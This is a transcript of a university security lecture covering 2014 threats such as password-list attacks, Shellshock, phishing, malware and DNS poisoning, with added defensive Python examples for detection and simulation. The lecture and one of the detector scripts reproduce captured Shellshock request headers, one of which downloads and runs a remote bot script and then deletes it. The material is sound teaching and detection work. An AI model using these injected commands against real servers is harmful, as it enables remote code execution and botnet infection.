Lecture about network and host security to NII students
TRANSCRIPT
Securing your IT Environment
HASEGAWA Akiumi
Dept. of Information Engineering
School of Engineering
Chukyo University
Why I became interested in the security field.
At midnight on the last day of the 20th century, I got an e-mail from US-CERT (United States Computer Emergency Response Team).
On that day, we were monitoring our systems' behavior for the Y2K problem.
The e-mail asked us to shut down machines on our university network which were attacking American universities.
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem of DNS
Concluding remarks
Between “internet” and “the Internet”
“internet” (lower case) is a term expressing the concept of connecting networks together.
“The Internet” is the global system of interconnected computer networks that use the standard Internet protocol suite (TCP/IP) to link several billion devices worldwide.
“The Internet” is not the Web, e-mail, and so on. Those are applications running on top of IP networks.
Most famous keyword: CIA
C for Confidentiality
only the intended, authorized persons can access the information
I for Integrity
maintaining and assuring the accuracy and consistency of data over its entire life cycle
A for Availability
authorized persons can access the information whenever they want
Another keyword: AAA
A for Authentication
verifying who the user is
A for Authorization
allowing the authenticated user to access only the services she/he is permitted to use
A for Accounting
logging the activities of users
Current or ongoing problems
Security trends (charts from the white paper of the Ministry of Internal Affairs and Communications)
Trends in security threats: http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html
Malware trend 2011 - 2013: http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.htm
Top 10 security threats this year: http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html
RANK | TYPE OF THREAT | AIM OF ATTACK
1 | Spear phishing by e-mail | information theft
2 | Unauthorized computer access | information theft
3 | Website tampering or compromise | information theft, denial of service
4 | Information leakage from websites | information theft
5 | Online banking attacks | information theft
6 | Malicious applications for smartphones | information theft
7 | Unintended privacy/information leakage on SNS | -
8 | Information leakage from lost mobile hardware | -
9 | Ransomware and the like | information theft
10 | Denial of service | denial of service
Topics in the last year
The ID-and-password system is about to die
Severe bugs in major open source software
Severe problems in the DNS system/protocol were exposed!
SSL (Secure Sockets Layer) is dying
Watering hole attacks
compromised GOM Player site
compromised EmEditor site
Spear phishing attacks
Sony Pictures Entertainment
ICANN
The ID-and-password system is about to die.
Brute force attacks
trying randomly generated strings
Dictionary attacks
trying a list (or lists) of commonly used passwords
Password list attacks
trying a list of ID/password pairs leaked from some other service (this works because people reuse the same password across services)
This type of attack is very successful.
Known password list attacks
Starting date | Target | Successful logins | Attempts | Success rate
Nov. 2013 to Feb. 2014 | Ticket Pia | ? | ? | ?
5th Feb. | mixi | 370 | - | -
28th Feb. | mixi | 16,972 | - | -
27th May to 4th June | niconico | 219,926 | 2,203,590 | 9.98%
31st May to 17th June | mixi | 263,596 | - | -
19th June to 23rd June | Ameba | 38,280 | 2,293,543 | 1.7%
23rd June to 24th June | CAPAT | 11,502 | ? | ?
28th June to 29th June | Bandai-Namco | 14,399 | 1,796,629 | 0.8%
1st July to 28th July | Pointalk, goo | 1,265 | ? | ?
13th Aug. | MUJI 無印良品 | 20,957 | 4,220,382 | 0.5%
15th Aug. | Suica point club | 756 | 296,000 | 0.3%
22nd Sep. to 23rd Sep. | MUJI 無印良品 | 19 | 18,663 | 0.1%
25th Sep. to 26th Sep. | Kuroneko members | 10,589 | 1,900,000 | 5.6%
27th Sep. to 29th Sep. | docomo ID | 6,072 | 22,500,000 | 0.3%
28th Sep. | Sagawa Express | 34,161 | ? | ?
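The success rates in the table are what a defender can also compute from login logs, and the pattern that distinguishes a password list attack from brute force (many different IDs from one source, each tried about once, with a success rate of a fraction of a percent to a few percent) can be detected the same way. The following is an added example, not from the lecture; the log format, the thresholds and the sample lines are constructed assumptions:

```python
"""Telling a password-list (credential stuffing) attack apart from brute force
in login logs. Added example, not from the lecture. The log format
"<timestamp> <source-ip> <user-id> OK|FAIL" and the thresholds are assumptions;
the sample log is constructed."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<user>\S+) (?P<result>OK|FAIL)$")


def build_sample_log() -> List[str]:
    """Constructed sample: one list attack, one brute force, one real user."""
    lines = []
    # Password-list attack: 20 different IDs, each tried exactly once (the pair
    # either works or it does not); two of them succeed (10% success rate).
    for i in range(20):
        result = "OK" if i in (3, 11) else "FAIL"
        lines.append(f"2014-06-28T01:00:{i:02d} 203.0.113.5 user{i:03d} {result}")
    # Brute force / dictionary attack: a single ID hammered 15 times.
    for i in range(15):
        lines.append(f"2014-06-28T01:01:{i:02d} 192.0.2.9 admin FAIL")
    # Legitimate user: one typo, then a successful login.
    lines.append("2014-06-28T01:02:00 198.51.100.7 alice FAIL")
    lines.append("2014-06-28T01:02:05 198.51.100.7 alice OK")
    return lines


@dataclass
class SourceStats:
    attempts: int = 0
    successes: int = 0
    users: Set[str] = field(default_factory=set)

    def success_rate(self) -> float:
        return self.successes / self.attempts if self.attempts else 0.0

    def user_spread(self) -> float:
        """Distinct IDs per attempt: close to 1.0 means every ID was tried once."""
        return len(self.users) / self.attempts if self.attempts else 0.0


def collect(lines: List[str]) -> Dict[str, SourceStats]:
    """Aggregate attempts, successes and distinct IDs per source address."""
    stats: Dict[str, SourceStats] = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that do not fit the assumed format
        s = stats.setdefault(m["src"], SourceStats())
        s.attempts += 1
        s.users.add(m["user"])
        if m["result"] == "OK":
            s.successes += 1
    return stats


def classify(s: SourceStats, min_attempts: int = 10, spread_threshold: float = 0.8) -> str:
    """Heuristic with assumed thresholds: many attempts spread over many different
    IDs is the signature of a leaked-list attack; many attempts on few IDs is
    brute force or a dictionary attack."""
    if s.attempts < min_attempts:
        return "normal"
    if s.user_spread() >= spread_threshold:
        return "password-list attack"
    return "brute-force/dictionary attack"


def analyze(lines: List[str]) -> Dict[str, Tuple[str, SourceStats]]:
    return {src: (classify(s), s) for src, s in collect(lines).items()}


if __name__ == "__main__":
    for src, (label, s) in analyze(build_sample_log()).items():
        print(f"{src:15} {label:30} attempts={s.attempts:3} ids={len(s.users):3} "
              f"success rate={s.success_rate():.1%}")
```

A real deployment would also key on the rate of attempts per minute and on IDs that are unknown to the service (a leaked list from another site contains many IDs that do not exist locally), but the spread of distinct IDs alone already separates the two attack styles in this sample.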
Line account hijacking and fraud
Line account hijacking was notable this year.
Skype accounts are also targeted.
Hijackers ask the victim's friends to buy iTunes cards on their behalf and to tell them the card numbers.
The activities appear to be organized and to follow prepared scripts.
Line decided to introduce a PIN code to prevent such attacks.
Purpose of such attacks
For money?
Professionals said “Probably not”.
They pointed out that direct monetary damage occurred in only two cases.
It is said that the attackers are checking the validity (completeness) of the credential lists they hold.
So, what comes next after these attacks?
News on Line account hijacking
http://news.yahoo.co.jp/pickup/6143059
Do's and Don'ts in account management
Don'ts
use easy-to-guess IDs and passwords
share the same ID and password among services
leave a PC without logging out or locking the screen
Do's
if possible, use two-step authentication
if it is not available, use a strong password and write it down in a hidden place
lock the screen or log out before leaving your seat
Defects found in widely used systems
OpenSSL severe bug
known as Heartbleed
raw data in server memory can be disclosed to a remote client
SSL 3.0 problem
known as POODLE
encrypted traffic can be decrypted
DNS cache poisoning problem
the cache of a resolver can be filled with forged records
Defects found in widely used systems (continued)
bash has a severe bug (known as Shellshock, disclosed 24 Sept.)
affects Web servers that run CGI programs
affects NAS (Network Attached Storage) and home routers
ntpd has a severe bug, disclosed this December
for Mac OS, a hotfix was released
this bug may affect home routers
Samba problems
affect NAS (Network Attached Storage)
Observed Shellshock attack (1)
Thu, 25 Sep 2014 02:41:59 GMT
209.126.230.72
-
GET / HTTP/1.0
Accept: */*
Host: () { :; }; ping -c 23 209.126.230.74
Referer: () { :; }; ping -c 11 209.126.230.74
User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
Cookie: () { :; }; ping -c 17 209.126.230.74
Observed Shellshock attack (2)
Sun, 28 Sep 2014 03:01:27 GMT
195.140.188.254
-
GET / HTTP/1.0
Host: 150.42.6.190
User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
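The two captures above have the same shape: a header value that starts with the function-definition prefix “() {” followed by commands, which a vulnerable bash would run when a CGI server passed the header to it as an environment variable (HTTP_HOST, HTTP_USER_AGENT, HTTP_COOKIE, ...). As an added example (not from the lecture; the captured request text is copied from above, everything else, including the function names and the regular expression, is constructed), here is a Python check that extracts the injected command from such requests and also runs the classic self-test against the local bash:

```python
"""Spotting Shellshock (CVE-2014-6271) probes in HTTP requests, and checking the
local bash. Added example, not from the lecture. The two request texts below are
reproduced from the captures shown above; everything else is this example's own."""
import os
import re
import subprocess
from typing import Dict, List, Optional, Tuple

# The prefix "() {" is what a vulnerable bash looked for when importing
# environment variables; whatever followed the closing "}" was then executed.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;\s*(?P<cmd>.+)$")

CAPTURE_1 = """GET / HTTP/1.0
Accept: */*
Host: () { :; }; ping -c 23 209.126.230.74
Referer: () { :; }; ping -c 11 209.126.230.74
User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
Cookie: () { :; }; ping -c 17 209.126.230.74"""

CAPTURE_2 = '''GET / HTTP/1.0
Host: 150.42.6.190
User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"'''


def parse_request(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw HTTP request into the request line and (name, value) headers."""
    lines = raw.splitlines()
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the header block
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def find_shellshock(raw: str) -> List[Dict[str, str]]:
    """One finding per header carrying a Shellshock payload. CGI servers copy
    every request header into an environment variable, so any header can be
    the vector, not just User-Agent."""
    findings = []
    _, headers = parse_request(raw)
    for name, value in headers:
        m = SHELLSHOCK_RE.search(value)
        if m:
            findings.append({"header": name, "command": m["cmd"].strip()})
    return findings


def local_bash_vulnerable() -> Optional[bool]:
    """The classic self-test: export a function-looking variable with a trailing
    command and see whether bash executes it. None if bash is not installed."""
    env = dict(os.environ, x="() { :;}; echo VULNERABLE")
    try:
        out = subprocess.run(["bash", "-c", "echo test"], env=env,
                             capture_output=True, text=True, timeout=5).stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "VULNERABLE" in out


if __name__ == "__main__":
    for cap in (CAPTURE_1, CAPTURE_2):
        for f in find_shellshock(cap):
            print(f"{f['header']:10} -> {f['command']}")
    print("local bash vulnerable:", local_bash_vulnerable())
```

Note that the first capture only makes the target ping the scanner's own host (a harmless reachability probe), while the second downloads and runs a bot script; both are caught by the same prefix match, which is what an intrusion detection rule for this bug keys on.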
Do you have a broadband router?
Check its configuration ASAP.
Change the administration password.
The operation manual can be downloaded from the manufacturer's site.
Some old routers have the HTTP port open to the Internet, so their configuration can be modified from the Web by anyone.
If you use a Wi-Fi router, do not use WEP!
WEP has severe defects in its design.
Attack tools are freely available.
An emergency patch is necessary for Allied Telesis routers and switches.
The basic software (firmware) of home routers has a severe bug, disclosed lately.
Classification of Malware
Virus
Worm
Trojan horse
Spyware/Adware
Ransomware/Cryptware
Computer Virus
A computer virus is software that tries to copy itself into files or application programs. If it succeeds, the computer is said to be infected.
As side effects, it may destroy files or the system, display messages, or spy on information.
It spreads as an e-mail attachment, or through compromised Web pages.
Computer Worm
A computer worm is a standalone program that replicates itself to other computers through networks. The famous song says that “an inchworm is measuring the marigolds”, and computer worms propagate like such worms. Whether it harms the system or not, its replication activity may bring heavy congestion to the Internet.
Trojan Horse
A Trojan horse is software that includes malicious code.
It looks like a useful/convenient application.
After infection, it may collect critical information and send it out, or open backdoors to the Internet to access or gain control of the system.
Spyware/Adware
Spyware is software that gathers information and sends it outside the system. It may be installed together with free software, with or without the consumer's consent.
Adware is software that displays ads while it is used. Such software is useful and free of charge, but it often bothers users by displaying advertisements.
Ransomware/Cryptware
Such software is installed when you click “Yes” on a red popup alert that says “Your system is infected”.
It takes control of the screen and demands payment to remove itself. It may also encrypt files and demand money for the key to decrypt them.
Watering hole attack
Attackers observe where the victims go (which Web sites they visit for information).
Attackers exploit and compromise that Web site based on the above observation.
When users visit the compromised site, malware is installed on the victims' PCs.
Attackers then gain control over those PCs.
Typical cases of watering hole attacks
GOM Player distribution site
The GOM Player distribution site was compromised.
PCs in the “Monju” nuclear reactor site were compromised via a GOM Player update. Was installing GOM Player allowed there???
EmEditor update site
The automatic update site of EmEditor was compromised.
There may have been no harm, because the malicious downloader only worked when accesses came from specific IP addresses.
ISC.ORG compromised lately
ISC recommends that those who accessed the site during the compromise scan their machines for malware.
ISC is the main distribution site of BIND and other software.
To avoid malware infection
Update software every month
but not on “black Tuesday” (Patch Tuesday; in Japan, it is Wednesday); wait several days or a week.
Anti-malware is necessary!
Windows 8 has “Windows Defender” by default
A personal firewall is needed.
block inbound connections
check outbound connections also!
Do not open e-mail attachments so easily
Do not say “Yes” to popup alerts of software instantly!
Easy to say but not easy to do!
Anti-malware/personal firewalls may do harm
false negative problems
may allow intrusion or infection.
the VirusTotal site is helpful when you get a file (or files) in doubt.
false positive problems
block necessary communication.
erase or quarantine necessary files.
(Figure: false positive vs. false negative, i.e. Type I and Type II errors)
http://marginalrevolution.com/marginalrevolution/2014/05/type-i-and-type-ii-errors-simplified.html
false positive is harmful
The routers of my office and my home are the same brand.
My office to my home is a 30-minute drive.
I released my mobile PC from my office LAN.
When I connected my mobile PC to my home LAN, my personal firewall blocked all connections because of a “compromise of the router”, and there was no way of unlocking it.
My friend's case
She updated her Firefox.
After the update, she started Firefox again.
She saw a popup asking yes or no, and she clicked “Yes” almost instantly.
She has had no web connection ever since.
(The popup read: “Firefox seems compromised. For your safety, block connection.” with Yes/No buttons.)
Recommended tools for web surfing
check whether the site is using EV-SSL, especially when using online banking.
useful add-ons for browsers
RequestPolicy for Firefox
Netcraft toolbar
WOT (Web of Trust), useful for Google users
useful Web page
VirusTotal: https://www.virustotal.com/
(Screenshot: sample of a phishing site)
E-mail handling
HTML format is risky
embedded scripts
embedded Web links
phishing is done by sending e-mail that includes faked links (the visible text shows one address, the link actually goes to another).
phishing for webmail account information is increasing.
Be careful with attached files
zip-encoded files are dangerous (an encrypted zip cannot be scanned by the anti-malware on the mail gateway)
if necessary, scan with anti-malware and “VirusTotal” before opening a file.
spam or phishing mail may come from your friends (their accounts or address books may have been hijacked).
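As an added example of the faked-link problem (not from the lecture; the HTML mail body and the host names in it are constructed, and the helper names are this example's own), the following Python script lists the anchors in an HTML mail whose visible text names a different host than the one the link really goes to, and links that do not use http(s) at all:

```python
"""Finding faked links in an HTML e-mail: anchors whose visible text names one
host while the href points at another. Added example, not from the lecture; the
mail body is constructed and the helper names are this example's own."""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Constructed sample mail: one faked link, one honest link, one javascript:
# link and one look-alike host name.
SAMPLE_MAIL = """<html><body>
<p>Dear customer, please confirm your account:</p>
<a href="http://203.0.113.10/login">https://www.example-bank.jp/login</a><br>
<a href="https://www.example-bank.jp/help">Help center</a><br>
<a href="javascript:alert(1)">www.example-bank.jp</a><br>
<a href="https://mail.example-bank.jp.evil.example/">mail.example-bank.jp</a>
</body></html>"""

# A host-name-looking token in the visible text (with or without a scheme).
HOST_RE = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in the document."""
    def __init__(self):
        super().__init__()
        self.links: List[Dict[str, str]] = []
        self._href: Optional[str] = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append({"href": self._href, "text": "".join(self._text).strip()})
            self._href = None


def host_of_href(href: str) -> Optional[str]:
    """Host the link really goes to; None for schemes that have no place in mail."""
    parts = urlsplit(href)
    if parts.scheme not in ("http", "https"):
        return None  # javascript:, data:, mailto:, or no URL at all
    return (parts.hostname or "").lower()


def host_in_text(text: str) -> Optional[str]:
    """Host the reader is shown, if the visible text looks like an address."""
    m = HOST_RE.search(text)
    return m.group(1).lower() if m else None


def find_suspicious_links(html: str) -> List[Dict[str, str]]:
    """Flag links whose scheme is not http(s), and links whose visible text
    shows a host name that does not match the host actually linked to."""
    p = LinkCollector()
    p.feed(html)
    findings = []
    for link in p.links:
        real = host_of_href(link["href"])
        shown = host_in_text(link["text"])
        if real is None:
            findings.append(dict(link, reason="non-http scheme"))
        elif shown and shown != real:
            findings.append(dict(link, reason=f"text says {shown}, link goes to {real}"))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_links(SAMPLE_MAIL):
        print(f"{f['reason']:60} {f['href']}")
```

The last sample link shows why an exact host comparison is needed rather than a substring check: “mail.example-bank.jp.evil.example” contains the bank's name but belongs to a different domain.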
Can we find a malware infection?
It is difficult to find a malware infection!
Modern malware works quietly to avoid disclosure of its existence.
The types and number of malware are increasing day by day.
Anti-malware vendors have difficulty catching newly developed malware.
In case of malware infection: Don'ts
hide that your PC is infected.
continue using the infected system.
use the “System Restore” function for recovery (the restore points may be infected too).
In case of malware infection: Do's
Stop using the infected computer!
Call the incident response team or the person in charge of the network system of your section and wait for his/her suggestions!
Safe recovery procedure from infection
1. format the hard disk (not a quick format)
2. install the system from read-only media
3. patch it
4. recover data from backup
Note: backups can be contaminated, so scan them before restoring.
Recovery from system troubles
Mac OS
Time Machine is helpful
Windows 7
System Restore
System Recovery
SNS problems
Privacy problems
Cyberstalking
Flaming
a single tweet can cause flaming
Sexting/Revenge porn
A leak to the Internet is unrecoverable!
Stalking case in Zushi
The murderer posted tweets on SNS asking for the victim's address.
He was also using a popular Q&A site to find the victim's address.
He was also using a private detective.
(Newspaper article on the Zushi case)
Don'ts in using SNS
disclose location information or other private matters (check the EXIF data of digital photos; it may contain the location where the photo was taken)
retweet or reply to someone asking for a person's address or private information
post private photos of yourself or your friends
For more, refer to this site.
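Checking the EXIF data of a photo before posting it can be done with the standard library alone. The following is an added example, not from the lecture: it constructs a minimal JPEG carrying a made-up GPS position in its Exif segment, then reads the position back, which is exactly what anyone who downloads the posted photo can do. The function names and the coordinates are this example's own:

```python
"""Reading the GPS position hidden in a photo's EXIF data before posting it.
Added example, not from the lecture. It builds a minimal JPEG with a constructed
Exif segment (the coordinates are made up) and parses it back with the standard
library only; helper names are this example's own."""
import struct
from typing import Dict, List, Optional, Tuple

TIFF_ASCII, TIFF_LONG, TIFF_RATIONAL = 2, 4, 5
TAG_GPS_IFD = 0x8825                       # IFD0 entry pointing at the GPS IFD
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 1, 2, 3, 4


def build_sample_jpeg() -> bytes:
    """Constructed: SOI, one APP1/Exif segment with IFD0 -> GPS IFD, EOI."""
    bo = "<"                              # little-endian TIFF ("II")
    ifd0_off = 8                          # right after the 8-byte TIFF header
    gps_off = ifd0_off + 2 + 12 + 4       # IFD0 holds one 12-byte entry
    lat_off = gps_off + 2 + 4 * 12 + 4    # GPS IFD holds four entries
    lon_off = lat_off + 24                # three RATIONALs = 24 bytes
    ent = lambda tag, typ, cnt, val: struct.pack(bo + "HHI", tag, typ, cnt) + val
    tiff = b"II" + struct.pack(bo + "HI", 42, ifd0_off)
    tiff += struct.pack(bo + "H", 1)
    tiff += ent(TAG_GPS_IFD, TIFF_LONG, 1, struct.pack(bo + "I", gps_off)) + b"\0\0\0\0"
    tiff += struct.pack(bo + "H", 4)
    tiff += ent(GPS_LAT_REF, TIFF_ASCII, 2, b"N\0\0\0")          # value fits inline
    tiff += ent(GPS_LAT, TIFF_RATIONAL, 3, struct.pack(bo + "I", lat_off))
    tiff += ent(GPS_LON_REF, TIFF_ASCII, 2, b"E\0\0\0")
    tiff += ent(GPS_LON, TIFF_RATIONAL, 3, struct.pack(bo + "I", lon_off))
    tiff += b"\0\0\0\0"
    # Made-up position 35 deg 18' 0" N, 139 deg 34' 48" E as deg/min/sec rationals.
    tiff += struct.pack(bo + "IIIIII", 35, 1, 18, 1, 0, 1)
    tiff += struct.pack(bo + "IIIIII", 139, 1, 34, 1, 48, 1)
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def exif_from_jpeg(jpeg: bytes) -> Optional[bytes]:
    """Walk the JPEG marker segments and return the TIFF body of the Exif APP1."""
    if jpeg[:2] != b"\xff\xd8":
        return None
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):        # EOI or start of scan: no more headers
            break
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]   # includes itself
        payload = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and payload.startswith(b"Exif\0\0"):
            return payload[6:]
        pos += 2 + length
    return None


def read_ifd(tiff: bytes, bo: str, off: int) -> Dict[int, Tuple[int, int, bytes]]:
    """Return {tag: (type, count, 4 raw value/offset bytes)} for one IFD."""
    n = struct.unpack(bo + "H", tiff[off:off + 2])[0]
    entries = {}
    for i in range(n):
        e = off + 2 + 12 * i
        tag, typ, cnt = struct.unpack(bo + "HHI", tiff[e:e + 8])
        entries[tag] = (typ, cnt, tiff[e + 8:e + 12])
    return entries


def read_rationals(tiff: bytes, bo: str, off: int, count: int) -> List[float]:
    vals = struct.unpack(bo + "I" * (2 * count), tiff[off:off + 8 * count])
    return [vals[i] / vals[i + 1] for i in range(0, 2 * count, 2)]


def dms_to_decimal(dms: List[float], ref: str) -> float:
    deg = dms[0] + dms[1] / 60 + dms[2] / 3600
    return -deg if ref in ("S", "W") else deg


def gps_position(jpeg: bytes) -> Optional[Tuple[float, float]]:
    """(latitude, longitude) in decimal degrees, or None if there are no GPS tags."""
    tiff = exif_from_jpeg(jpeg)
    if tiff is None:
        return None
    bo = "<" if tiff[:2] == b"II" else ">"
    ifd0 = read_ifd(tiff, bo, struct.unpack(bo + "I", tiff[4:8])[0])
    if TAG_GPS_IFD not in ifd0:
        return None
    gps = read_ifd(tiff, bo, struct.unpack(bo + "I", ifd0[TAG_GPS_IFD][2])[0])
    if not all(t in gps for t in (GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON)):
        return None
    lat_ref = gps[GPS_LAT_REF][2][:1].decode()
    lon_ref = gps[GPS_LON_REF][2][:1].decode()
    lat = read_rationals(tiff, bo, struct.unpack(bo + "I", gps[GPS_LAT][2])[0], 3)
    lon = read_rationals(tiff, bo, struct.unpack(bo + "I", gps[GPS_LON][2])[0], 3)
    return dms_to_decimal(lat, lat_ref), dms_to_decimal(lon, lon_ref)


if __name__ == "__main__":
    print("position in photo:", gps_position(build_sample_jpeg()))
```

If the position comes back as anything other than None, the photo tells where it was taken; strip the Exif segment (or re-save the image without it) before posting.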
The basic problem on the Internet
DNS is the protocol and system that converts domain names to IP addresses.
Ill-configured or ill-managed home routers can be easily compromised. Intruders may change the DNS server setting of the router, so that every device behind it uses the attacker's resolver. This happened in Mexico.
DNS poisoning is easy.
Send a query to the target resolver and at the same time generate and send forged answers, racing the real answer.
If poisoned, users of the poisoned resolver are led to a fake server, and you can imagine what happens.
DNS query mechanism
(Figure from https://www.nic.ad.jp/ja/newsletter/No40/0800.html)
Kaminsky attack
(Figures: the old attack, and the Kaminsky attack)
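To see why the Kaminsky attack is so much worse than the old attack, and why randomizing the resolver's source port (not just the 16-bit transaction ID) matters, here is an added simulation (not from the lecture; the resolver model, the number of forged answers per round and the 16-bit port space are assumptions):

```python
"""Why Kaminsky-style cache poisoning works against a resolver that randomizes
only the 16-bit transaction ID, and why source-port randomization stops it.
Added example, not from the lecture: a constructed simulation, with both spaces
taken as 2^16 for simplicity (real resolvers use about 64K ports)."""
import random
from dataclasses import dataclass
from typing import Optional

TXID_SPACE = 1 << 16   # the DNS transaction ID is 16 bits
PORT_SPACE = 1 << 16   # assumption: source port drawn uniformly from 16 bits
FIXED_PORT = 53        # old resolvers always asked from one well-known port


@dataclass
class Outcome:
    rounds: int
    successes: int
    first_success: Optional[int]   # round index of the first poisoned answer


def simulate(rounds: int, forged_per_round: int, randomize_port: bool, seed: int = 1) -> Outcome:
    """Each round, the attacker makes the resolver look up a fresh random name
    (e.g. a1b2c3.example.com), so a lost race costs nothing: there is no cached
    answer to wait out, the next round simply uses another name. That is the
    Kaminsky improvement over the old attack, which had to wait for the TTL to
    expire after every failure. The resolver accepts a forged answer only if both
    transaction ID and destination port match its outstanding query."""
    rng = random.Random(seed)
    successes, first = 0, None
    for r in range(rounds):
        txid = rng.randrange(TXID_SPACE)
        port = rng.randrange(PORT_SPACE) if randomize_port else FIXED_PORT
        # The attacker cannot see the query; each forged answer is a blind guess.
        guesses = {
            (rng.randrange(TXID_SPACE),
             rng.randrange(PORT_SPACE) if randomize_port else FIXED_PORT)
            for _ in range(forged_per_round)
        }
        if (txid, port) in guesses:
            successes += 1
            if first is None:
                first = r
    return Outcome(rounds, successes, first)


def expected_rounds(forged_per_round: int, randomize_port: bool) -> float:
    """Rough expected number of rounds until the first success: the per-round
    hit chance is about guesses / space, so the wait is space / guesses."""
    space = TXID_SPACE * (PORT_SPACE if randomize_port else 1)
    return space / forged_per_round


if __name__ == "__main__":
    for rp in (False, True):
        o = simulate(rounds=2000, forged_per_round=400, randomize_port=rp)
        print(f"port randomization={rp!s:5} poisoned {o.successes} times in {o.rounds} rounds "
              f"(first at round {o.first_success}); "
              f"expected ~{expected_rounds(400, rp):.0f} rounds per success")
```

With 400 forged answers per round and only the transaction ID to guess, the resolver is poisoned after a couple of hundred rounds on average, i.e. within seconds on a LAN; adding 16 bits of port entropy multiplies the expected work by 65536, which is why the 2008 fix for the Kaminsky attack was source-port randomization (and, longer term, DNSSEC).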
Concluding Remarks
Severe problems of the Internet were found in the year 2014.
The ID-and-password system may come to an end.
Much new malware and many new attack tools are developed daily.
Be careful when you are posting on SNS etc.
Check and maintain your home routers, network attached storage, TV sets, video recorders, etc. properly.
Basic knowledge about Internet technology is important
for your safety